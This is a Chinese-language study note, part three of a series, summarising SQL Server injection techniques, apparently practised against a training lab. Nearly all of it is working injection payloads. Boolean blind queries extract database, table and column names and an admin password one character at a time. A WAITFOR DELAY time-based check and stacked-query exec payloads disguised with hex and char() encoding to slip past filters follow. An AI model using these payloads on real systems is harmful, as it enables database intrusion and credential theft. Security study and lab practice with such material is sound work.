【学习笔记】Sqlserver/Mssql注入总结(三)

id=2' and ascii(substring((select DB_NAME(5)),1,1)) > 109--//查询第五个数据库第一个字符的ascii码是否大于109

id=2 and ascii(substring((select top 1 name from mozhe_db_v2..sysobjects where xtype='u'),1,1)) >100//查询第一个表名的第一个字符的ascii码是否大于100

id=2 and ascii(substring((SELECT TOP 1 table_name FROM information_schema.tables),1,1)) >0

id=2 and ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where name ='manage')),1,1)) >100//查询第manage表的第一个列名第一个字符的ascii码是否大于100

id=2 and ascii(substring((SELECT TOP 1 col_name(object_id('manage'),1) from sysobjects),1,1)) >100

id=2 and ascii(substring((SELECT top 1 column_name from information_schema.columns where table_name='manage'),1,1)) >0

id=2 and ascii(substring((select top 1 username from manage),1,1)) >0

id=2 and ascii(substring((select top 1 password from manage where username='admin_mz'),1,1)) >0

id=2; if(ascii(substring((select db_name()),1,1)) >1) WAITFOR DELAY '0:0:5'--  //如果判断正确，延迟五秒执行sql语句

id = 1 ; declare @a nvarchar ( 2000 ) set @a = 'select convert(int,@@version)' exec ( @a ) --

id = 1 ; declare @s varchar ( 2000 ) set @s = 0x73656c65637420636f6e7665727428696e742c404076657273696f6e29 exec ( @s )--    //0x命令hex编码后的

id = 1 ; declare @s varchar ( 2000 ) set @s = char ( 115 ) + char ( 101 ) + char ( 108 ) + char ( 101 ) + char ( 99 ) + char ( 116 ) + char ( 32 ) + char ( 99 ) + char ( 111 ) + char ( 110 ) + char ( 118 ) + char ( 101 ) + char ( 114 ) + char ( 116 ) + char ( 40 ) + char ( 105 ) + char ( 110 ) + char ( 116 ) + char ( 44 ) + char ( 64 ) + char ( 64 ) + char ( 118 ) + char ( 101 ) + char ( 114 ) + char ( 115 ) + char ( 105 ) + char ( 111 ) + char ( 110 ) + char ( 41 ) exec ( @s )--    //ascii编码的字符，利用+号拼接